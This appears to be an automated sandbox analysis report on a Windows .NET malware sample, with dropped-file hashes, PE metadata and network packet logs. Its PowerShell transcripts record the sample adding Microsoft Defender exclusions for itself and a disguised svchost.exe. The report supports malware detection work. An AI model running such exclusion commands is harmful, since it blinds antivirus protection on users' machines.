                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview: 1
                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5kukagc.411.psm1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview: 1
                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iuekw4yc.egl.ps1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview: 1
                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjobcix1.uu4.psm1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview: 1
                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w3ochp5k.jrz.ps1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview: 1
                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wixb2r5b.jug.ps1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview: 1
                                                                            C:\Users\user\Documents\20210408\PowerShell_transcript.445817.Mn7w2WZt.20210408125033.txt
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):844
                                                                            Entropy (8bit):5.347838101785983
                                                                            Encrypted:false
                                                                            SSDEEP:24:BxSAGxvBnSqx2DOXUWeSudpWKHjeTKKjX4CIym1ZJXEudh:BZyvhtoO+SS4KqDYB1ZKSh
                                                                            MD5:352BBCDF64C2EA53997B4F3DF4DA18F4
                                                                            SHA1:4F5BFC94DCDC05EECE0539B3BA0C8F599777EBD3
                                                                            SHA-256:0F8EC89B9964801655EB83648FDAD3C5A3F25F810E616FFCEB27A2D7C820E4FC
                                                                            SHA-512:0ECA64AD0A633C49EC4965A935353C920A37CB7E8ADD2D84C948C58C3EA8BFD4AD5D4A074A7D33A06A5DF3CAECDB379152D6EDBE2AF887A39C5F01EF69AE627F
                                                                            Malicious:false
                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408125102..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\qINcOlwRud.exe -Force..Process ID: 1364..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408125102..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\qINcOlwRud.exe -Force..
                                                                            C:\Users\user\Documents\20210408\PowerShell_transcript.445817.P1Qvf8QW.20210408125034.txt
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):918
                                                                            Entropy (8bit):5.392041724419666
                                                                            Encrypted:false
                                                                            SSDEEP:24:BxSA1xvBnSqx2DOXUWeSuIE9WRHjeTKKjX4CIym1ZJXVuIEV:BZHvhtoO+SA0RqDYB1Z7AV
                                                                            MD5:322946366FBBBD90E8A2E1EB1E47A7C7
                                                                            SHA1:EC5704A11E6E7B1BF4849B7FB8B19093BB15D067
                                                                            SHA-256:79EEA929E405F34A7C07E10D51B1196F9F3FF10ABB8BE8CD75404A3699A3FAAF
                                                                            SHA-512:9643EABA8FBE4749E70B5C498C02116E7884677DD1D3CEECE79AE9DB523DDFA1509D40B94BFBFA812F940684759E20A07034365D77FA518E4517DA3C0FD00D7B
                                                                            Malicious:false
                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408125103..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe -Force..Process ID: 3880..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408125103..**********************..PS>Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe -Force..
                                                                            C:\Users\user\Documents\20210408\PowerShell_transcript.445817.yTtmKb3_.20210408125031.txt
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):917
                                                                            Entropy (8bit):5.400354377516213
                                                                            Encrypted:false
                                                                            SSDEEP:24:BxSA1xvBnSqx2DOXUWeSuIE9W5HjeTKKjX4CIym1ZJXWuIEV:BZHvhtoO+SA05qDYB1ZUAV
                                                                            MD5:A1285A990F54CA979E18F6B1D48A24F6
                                                                            SHA1:943654DB90876375D96B5B5B3CB1A4BAA92DAD0E
                                                                            SHA-256:AB360F03022252F0FE4B98B5AE67CD09F00A93FD3D2DBFBBC39EE1B53762A3D3
                                                                            SHA-512:1B2392C8A18DD8DD995BCA10DF60519058341D8166B2E7861D64B66222B4476B8EDA516D4B33D90212D91822F8BFA356D5E52745F07BE056AF8088B7DB8C0922
                                                                            Malicious:false
                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408125055..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe -Force..Process ID: 908..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408125056..**********************..PS>Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe -Force..
                                                                            C:\Users\user\QTSKUnyljdzYWpkbMIVLIBDYJvtcjEA
                                                                            Process:C:\Users\user\Desktop\qINcOlwRud.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):5184376
                                                                            Entropy (8bit):3.0316320496109426
                                                                            Encrypted:false
                                                                            SSDEEP:24576:P0/SheovRu0/SheovRYdSRdSfE0/SheovRYdSRdSfC:y
                                                                            MD5:929FC50359431E9E10EBB42953036B8A
                                                                            SHA1:DD2479918A4C8655A03E177581127D39794670D2
                                                                            SHA-256:549967FFC50E3D09F3D129C4C17B537DB6F7566060BFAE3F4CB8B775F5D29796
                                                                            SHA-512:3BE259001E0BBBB4C7BC4DA1757D57CF2E6C5C82E883C1CFCBF223988676810B2891F38CB7E42EFA3446C5361CD6DD906FC20DCA88E172D09F6ED02F4E7E99B5
                                                                            Malicious:false
                                                                            Preview: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 76 142 41 180 0 0 0 0 0 0 0 0 224 0 34 0 11 1 80 0 0 176 10 0 0 6 0 0 0 0 0 0 158 207 10 0 0 32 0 0 0 224 10 0 0 0 0 128 0 32 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 32 11 0 0 2 0 0 0 0 0 0 2 0 64 133 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 72 207 10 0 83 0 0 0 0 224 10 0 212 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 11 0 12 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 8 0 0 0 0 0 0 0 0 0 0 0 8 32 0 0 72 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 164 175 10 0 0 32 0 0 0 176 10 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96
                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):55
                                                                            Entropy (8bit):4.306461250274409
                                                                            Encrypted:false
                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                            Malicious:false
                                                                            Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):5.935771952119223
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:qINcOlwRud.exe
                                                                            File size:46592
                                                                            MD5:d6b29add344d2284845f133b8505126e
                                                                            SHA1:fdb44b36f8c31a60a47db4f4ce6d4975367d7a7c
                                                                            SHA256:552a8d763c86bb50ded18cf8f790f18828c471ec5a4d3cac71eaf7693314a04c
                                                                            SHA512:7ec6e7f8f2ebe947b8b05eb4880d6a34d8b92965e7548fb5038716d5912bc299e3078b755373df9b7414b61154e625d7b689fbd1f39dfb4363f382449bce7ff6
                                                                            SSDEEP:768:67mDHfLLLkF0FenHiwAGflA7qOSn8bQ1xHWBnBeladzvRwyx0klmJc7z6GkZCcoz:7/ngF0m/87qOSn8bQ1xHWBnBeladzvRj
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..j...J........... ........@.. ....................... ......}.....@................................

                                                                            File Icon

                                                                            Icon Hash:30828a8c8c828010

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x4089ce
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:true
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:v4.0.30319
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Authenticode Signature

                                                                            Signature Valid:
                                                                            Signature Issuer:
                                                                            Signature Validation Error:
                                                                            Error Number:
                                                                            Not Before, Not After
                                                                              Subject Chain
                                                                                Version:
                                                                                Thumbprint MD5:
                                                                                Thumbprint SHA-1:
                                                                                Thumbprint SHA-256:
                                                                                Serial:

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x89740x57.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x4664.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x74000x1480.text
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x69d40x6a00False0.358453714623data6.41745283228IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0xa0000x46640x4800False0.14892578125data4.10630489014IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x100000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountry
                                                                                RT_ICON0xa1300x4028dBase III DBT, version number 0, next free block index 40
                                                                                RT_GROUP_ICON0xe1580x14data
                                                                                RT_VERSION0xe16c0x30cdata
                                                                                RT_MANIFEST0xe4780x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Version Infos

                                                                                DescriptionData
                                                                                Translation0x0000 0x04b0
                                                                                LegalCopyrightCopyright 2021
                                                                                Assembly Version1.0.0.0
                                                                                InternalNameDimbono.exe
                                                                                FileVersion1.0.0.0
                                                                                CompanyName
                                                                                LegalTrademarks
                                                                                Comments
                                                                                ProductNameDimbono
                                                                                ProductVersion1.0.0.0
                                                                                FileDescriptionDimbono
                                                                                OriginalFilenameDimbono.exe

                                                                                Network Behavior

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Apr 8, 2021 12:50:22.661570072 CEST4968280192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:22.679114103 CEST8049682104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:22.679291964 CEST4968280192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:22.679862022 CEST4968280192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:22.697427034 CEST8049682104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:22.716279984 CEST8049682104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:22.750838995 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:22.762620926 CEST4968280192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:22.768959999 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:22.769126892 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:22.794027090 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:22.811892033 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:22.814680099 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:22.814704895 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:22.814810991 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:22.828917980 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:22.846438885 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:22.846590042 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:22.887656927 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:22.915126085 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:22.933028936 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.138725996 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.138742924 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.138757944 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.138770103 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.138786077 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.138802052 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.138814926 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.138825893 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.138843060 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.138855934 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.138928890 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.139015913 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.321161985 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.321191072 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.321326971 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.321649075 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.322159052 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.322185040 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.322206974 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.322221994 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.322232962 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.322242022 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.322263002 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.322271109 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.322288990 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.322299004 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.322312117 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.322340965 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.322664022 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.322709084 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.322740078 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.322746992 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.322810888 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.323467970 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.323513031 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.323539972 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.323587894 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.323611021 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.323633909 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.323679924 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.324562073 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.324594975 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.324666023 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.324672937 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.324700117 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.324745893 CEST49683443192.168.2.3104.21.56.119
                                                                                Apr 8, 2021 12:50:23.325334072 CEST44349683104.21.56.119192.168.2.3
                                                                                Apr 8, 2021 12:50:23.325368881 CEST44349683104.21.56.119192.168.2.3
